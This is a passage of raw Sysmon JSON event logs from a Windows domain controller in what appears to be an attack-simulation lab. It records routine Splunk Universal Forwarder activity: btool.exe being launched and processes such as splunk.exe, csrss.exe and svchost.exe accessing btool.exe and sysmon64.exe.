Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1963,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.942\r\nProcessGuid: {A837DB8D-01C8-5F25-0000-001067D90300}\r\nProcessId: 3968\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nParentProcessId: 3736\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.942","ProcessGuid":"{A837DB8D-01C8-5F25-0000-001067D90300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-001075BD0300}","ParentProcessId":"3736","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1964,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nSourceProcessId: 3736\r\nSourceThreadId: 3716\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001067D90300}\r\nTargetProcessId: 3968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","SourceProcessId":"3736","SourceThreadId":"3716","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001067D90300}","TargetProcessId":"3968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1965,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001067D90300}\r\nTargetProcessId: 3968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001067D90300}","TargetProcessId":"3968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1966,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1967,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1968,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1969,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1970,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1971,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 